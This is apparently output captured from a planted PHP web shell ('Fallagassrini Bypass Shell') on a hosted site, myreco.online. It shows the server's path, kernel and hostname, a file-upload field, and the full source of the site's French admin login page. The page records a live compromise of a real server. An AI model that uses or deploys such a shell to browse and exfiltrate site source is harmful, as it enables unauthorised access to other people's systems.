Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/h/a/p/happyrenas/myreco.online/administration/panel/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/h/a/p/happyrenas/myreco.online/administration/panel/login.php

<?

set_include_path(get_include_path() . PATH_SEPARATOR . __DIR__ . '/../');
include("../../configuration.php");
include("../../includes/fonctions.php");
setlocale(LC_TIME, 'fr_FR.UTF-8');



$page="login";

$mail_recuperation								= $db->escape($_REQUEST['mail_recuperation']);
$password_recuperation							= $db->escape($_REQUEST['password_recuperation']);
$logout											= $db->escape($_REQUEST['logout']);
include("auth.php");

?>
<!DOCTYPE html>

<html lang="fr">
	<!--begin::Head-->
	<head>
		<meta charset="utf-8" />
		<title><?echo $titre_application;?></title>
		<meta name="description" content="Login page example" />
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
		<link rel="canonical" href="https://keenthemes.com/metronic" />
		<!--begin::Fonts-->
		<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" />
		<!--end::Fonts-->
		<!--begin::Page Custom Styles(used by this page)-->
		<link href="../assets/css/pages/login/login-1.css" rel="stylesheet" type="text/css" />
		<!--end::Page Custom Styles-->
		<!--begin::Global Theme Styles(used by all pages)-->
		<link href="../assets/plugins/global/plugins.bundle.css" rel="stylesheet" type="text/css" />
		<link href="../assets/plugins/custom/prismjs/prismjs.bundle.css" rel="stylesheet" type="text/css" />
		<link href="../assets/css/style.bundle.css" rel="stylesheet" type="text/css" />
		<!--end::Global Theme Styles-->
		<!--begin::Layout Themes(used by all pages)-->
		
		<!--end::Layout Themes-->
		<link rel="shortcut icon" href="<?echo $icone;?>" />
		<style>
		.login-aside {
    background-image: url('img/login2025.jpg');
    background-size: cover; /* Couvre tout l'élément */
    background-position: center; /* Centre l'image */
    background-repeat: no-repeat; /* Évite la répétition de l'image */
}
.btn-orange {
    color: #fff;
    background-color: #2e92a8; /* Couleur de fond orange */
    border-color: #2e92a8; /* Couleur de la bordure */
}

.btn-orange:hover, 
.btn-orange:focus, 
.btn-orange:active, 
.btn-orange.active, 
.show > .btn-orange.dropdown-toggle {
    color: #fff;
    background-color: #66bed1; /* Couleur de fond survolée */
    border-color: #66bed1; /* Couleur de la bordure survolée */
}

.btn-orange:focus {
    box-shadow: 0 0 0 0.2rem rgba(255, 140, 0, 0.5); /* Ombre de focus */
}

.form-control {
    transition: all 0.3s ease-in-out!important;
}

.form-control:focus {
    border-color: #2b8ea3!important;
    box-shadow: 0 0 8px rgba(46, 146, 168, 0.5)!important;
}
</style>
	</head>
	<!--end::Head-->
	<!--begin::Body-->
	<body id="kt_body" class="header-fixed header-mobile-fixed subheader-enabled subheader-fixed aside-enabled aside-fixed aside-minimize-hoverable page-loading">
		<!--begin::Main-->
		<div class="d-flex flex-column flex-root">
			<!--begin::Login-->
			<div class="login login-1 login-signin-on d-flex flex-column flex-lg-row flex-column-fluid bg-white" id="kt_login">
				<!--begin::Aside-->
				<div class="login-aside d-flex flex-column flex-row-auto" style="background-color: #172338;">
					<!--begin::Aside Top-->
					<div class="d-flex flex-column-auto flex-column pt-lg-40 pt-15">
						<!--begin::Aside header-->
						
						<!--end::Aside header--> 
						<!--begin::Aside title-->
						<!--<h3 class="font-weight-bolder text-center font-size-h4 font-size-h1-lg"  style="color: #E9E9E7;">PLANET AURA </h3>-->
						<!--end::Aside title-->
					</div>
					<!--end::Aside Top-->
					<!--begin::Aside Bottom-->
					
					<div class="aside-img d-flex flex-row-fluid bgi-no-repeat bgi-position-y-bottom bgi-position-x-center"></div>
					<!--end::Aside Bottom-->
				</div>
				<!--begin::Aside-->
				<!--begin::Content-->
				<div class="login-content flex-row-fluid d-flex flex-column justify-content-center position-relative overflow-hidden p-7 mx-auto">
					<!--begin::Content body-->
					<div class="d-flex flex-column-fluid flex-center">
						<!--begin::Signin-->
						<div class="login-form login-signin">
							<!--begin::Form-->
							<form class="form" action="login.php" method="post" id="kt_login_signin_form">
							<input type="hidden" name="remember_me_recuperation" value="1">
								<!--begin::Title-->
							
							<div class="pb-13 pt-lg-0 pt-5">
									<h3 class="font-weight-bolder  font-size-h4 font-size-h1-lg" style="color:#2b8ea3;">MyRECO.online</h3>
									<h2 class="font-weight-bolder font-size-h4 font-size-h2-lg" style="color:#2b8ea3;">Votre partenaire QRDCODE ! </h2>
									
									<span class="text-muted font-weight-bold font-size-h4"></span>
								</div>
								<div class="form-group">
									<label class="font-size-h6 font-weight-bolder " style="color:#2b8ea3;">Login</label>
									<input class="form-control form-control-solid h-auto py-6 px-6 rounded-lg" tabindex=1 type="text" value="<?echo $mail_recuperation;?>" name="mail_recuperation"  autocomplete="off" required />
								</div>
								<div class="form-group">
									<div class="d-flex justify-content-between mt-n5">
										<label class="font-size-h6 font-weight-bolder pt-5"  style="color:#2b8ea3;">Mot de passe </label>
										
									</div>
									<input class="form-control form-control-solid h-auto py-6 px-6 rounded-lg"  tabindex=2 type="password" name="password_recuperation" autocomplete="off" required />
									
									<a href="#" data-toggle="modal" data-target="#oublimdp" class="nav-link pl-0 pr-5">Mot de passe oublié?</a>
								</div>
								<div class="pb-lg-0 pb-5">
									<button type="submit" id="kt_login_signin_submit" class="btn btn-orange  btn-block font-weight-bolder font-size-h6 px-8 py-4 my-3 mr-3">Connexion</button>
									
									<br>
									<?if ($error) {?><div id="message" class="text-danger mt-2" style="">Accès refusé</div><?}?>
									<?if ($reset_link) {?><div id="message" class="font-weight-boldest text-success mt-2" style="">Si votre compte existe, vous allez recevoir un email de re-initialisation de mot de passe.</div><?}?>
									<?if ($reset_password==1) {?><div id="message" class="font-weight-boldest font-size-h5 text-success mt-2" style="">Votre mot de passe a bien été modifié.</div><?}?>
									
									
								</div>
								
								
								<!--end::Action-->
							</form>
							<!--end::Form-->
						</div>
						<!--end::Signin-->
						<!--begin::Signup-->
						
						<!--end::Signup-->
						<!--begin::Forgot-->
						<!--end::Forgot-->
					</div>
					
					<!--end::Content body-->
					<!--begin::Content footer-->
					<div class="d-flex justify-content-lg-start justify-content-center align-items-end py-7 py-lg-0">
						<div class="text-dark-50 font-size-lg font-weight-bolder mr-10">
							<span class="mr-1">2025 - Halt</span>
						</div>
					</div>
					
					
					
					<!--end::Content footer-->
				</div>
				<!--end::Content-->
			</div>
			<!--end::Login-->
		</div>
		<!--end::Main-->

		<!--begin::Global Config(global config for global JS scripts)-->
		<script src="js/global.js"></script>
		<!--end::Global Config-->
		<!--begin::Global Theme Bundle(used by all pages)-->
		<script src="../assets/plugins/global/plugins.bundle.js?v=7.1.1"></script>
		<script src="../assets/plugins/custom/prismjs/prismjs.bundle.js?v=7.1.1"></script>
		<script src="../assets/js/scripts.bundle.js?v=7.1.1"></script>
		<!--end::Global Theme Bundle-->
		<!--begin::Page Scripts(used by this page)-->
				

		<!--end::Page Scripts-->
	</body>
	<!--end::Body-->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net